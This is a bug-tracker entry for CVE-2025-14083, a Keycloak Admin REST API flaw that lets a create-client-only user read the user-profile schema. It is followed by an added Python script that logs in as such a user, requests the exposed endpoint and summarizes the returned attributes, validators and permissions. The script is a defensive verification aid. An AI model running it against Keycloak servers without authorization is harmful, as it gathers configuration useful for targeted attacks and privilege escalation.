Bug 2419086 (CVE-2025-14083)

Summary: CVE-2025-14083 keycloak-server: Keycloak: Improper Access Control in Admin REST API leads to information disclosure
Product: [Other] Security Response
Reporter: OSIDB Bzimport <bzimport>
Component: vulnerability
Assignee: Product Security DevOps Team <prodsec-dev>
Status: NEW
Severity: low
Priority: low
Version: unspecified
CC: aschwart, boliveir, mposolda, pjindal, rmartinc, ssilvert, sthorger, vmuzikar
Keywords: Security
Hardware: All
OS: Linux
Doc Type: ---
Doc Text:
A flaw was found in the Keycloak Admin REST API. This vulnerability allows the exposure of backend schema and rules, potentially leading to targeted attacks or privilege escalation via improper access control.

Description OSIDB Bzimport 2025-12-05 06:11:16 UTC
An Improper Access Control vulnerability exists in the Keycloak Admin REST API, where a user possessing only the create-client permission—considered low-privilege by design—can unexpectedly access the /admin/realms/master/users/profile endpoint. This endpoint returns internal user profile schema data, including attribute names, validation rules, display metadata, and permission mappings. Although the attacker cannot view actual user accounts, the exposure of backend schema and rules results from insufficient authorization checks specifically on this endpoint. An authenticated but minimally privileged user can remotely retrieve sensitive configuration metadata, which may be leveraged to craft targeted attacks or prepare future privilege-escalation attempts.
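The check a realm administrator would want after reading the description above, as an added example that is not part of the bug report and not Keycloak project code: obtain a token for a test user that holds only the create-client admin role (a user the tester creates beforehand), request /admin/realms/master/users/profile with it, and report whether the user-profile configuration comes back. The endpoint paths are Keycloak's standard token and Admin REST URLs; the use of the built-in admin-cli client with the password grant, the KC_URL, KC_USER and KC_PASS environment variables, and the SAMPLE_PROFILE document (constructed to look like a user-profile configuration) are assumptions of this example. The summarizer shows what the report means by attribute names, validation rules and permission mappings without printing a live server's configuration verbatim.

```python
"""Verify whether a create-client-only admin user can read the user-profile
configuration (the exposure described for CVE-2025-14083).

Added example, not Keycloak code and not from the bug report. Assumes:
  * KC_URL  - base URL of the Keycloak server (e.g. https://kc.example)
  * KC_USER / KC_PASS - a master-realm user holding only the create-client role
  * the built-in admin-cli client accepts the password grant (its default)
Only the pure helpers are exercised offline; the HTTP calls run from main().
"""
import json
import os
import sys
import urllib.error
import urllib.parse
import urllib.request


def profile_endpoint_url(base_url: str, realm: str = "master") -> str:
    """The Admin REST endpoint named in the report for the given realm."""
    return (f"{base_url.rstrip('/')}/admin/realms/"
            f"{urllib.parse.quote(realm, safe='')}/users/profile")


def token_endpoint_url(base_url: str, realm: str = "master") -> str:
    """Standard OpenID Connect token endpoint of a Keycloak realm."""
    return (f"{base_url.rstrip('/')}/realms/"
            f"{urllib.parse.quote(realm, safe='')}/protocol/openid-connect/token")


def classify_status(status: int) -> str:
    """Turn the HTTP status of the profile request into a verdict."""
    if status == 200:
        return "EXPOSED"          # schema returned to a create-client-only caller
    if status == 403:
        return "ENFORCED"         # the authorization check rejected the caller
    if status == 401:
        return "UNAUTHENTICATED"  # bad or expired token: the check is inconclusive
    return "INCONCLUSIVE"


def summarize_profile(config: dict) -> list:
    """Reduce a user-profile configuration document to the fields the report
    calls sensitive: attribute names, validator names, and view/edit scopes."""
    summary = []
    for attr in config.get("attributes", []):
        perms = attr.get("permissions") or {}
        summary.append({
            "name": attr.get("name"),
            "validators": sorted((attr.get("validations") or {}).keys()),
            "view": sorted(perms.get("view") or []),
            "edit": sorted(perms.get("edit") or []),
        })
    return summary


def password_grant_token(base_url, realm, username, password, client_id="admin-cli"):
    """Resource Owner Password grant against the realm token endpoint (assumed enabled)."""
    form = urllib.parse.urlencode({
        "grant_type": "password", "client_id": client_id,
        "username": username, "password": password,
    }).encode()
    req = urllib.request.Request(
        token_endpoint_url(base_url, realm), data=form,
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)["access_token"]


def check_profile_access(base_url, token, realm="master"):
    """GET the profile endpoint as the bearer; return (verdict, parsed body or None)."""
    req = urllib.request.Request(profile_endpoint_url(base_url, realm),
                                 headers={"Authorization": f"Bearer {token}"})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return classify_status(resp.status), json.load(resp)
    except urllib.error.HTTPError as err:
        return classify_status(err.code), None


# Constructed sample shaped like a user-profile configuration; not real data.
SAMPLE_PROFILE = {
    "attributes": [
        {"name": "username",
         "validations": {"length": {"min": 3, "max": 255},
                         "username-prohibited-characters": {}},
         "permissions": {"view": ["admin", "user"], "edit": ["admin", "user"]}},
        {"name": "employeeId", "displayName": "Employee ID",
         "validations": {"pattern": {"pattern": "^E[0-9]{6}$"}},
         "permissions": {"view": ["admin"], "edit": ["admin"]}},
    ],
    "groups": [{"name": "user-metadata"}],
}


if __name__ == "__main__":
    base, user, pw = (os.environ.get(k) for k in ("KC_URL", "KC_USER", "KC_PASS"))
    if not all((base, user, pw)):
        sys.exit("set KC_URL, KC_USER and KC_PASS for the create-client-only test user")
    verdict, body = check_profile_access(base, password_grant_token(base, "master", user, pw))
    print(f"{profile_endpoint_url(base)} -> {verdict}")
    if body is not None:
        for attr in summarize_profile(body):
            print(f"  {attr['name']}: validators={attr['validators']} "
                  f"view={attr['view']} edit={attr['edit']}")
```

A verdict of EXPOSED for a user that holds nothing but create-client reproduces the condition described in the report; ENFORCED is the behaviour an authorization check on the endpoint should produce. Because the check only needs a create-client-only user, it can be run against a staging instance without touching any real accounts.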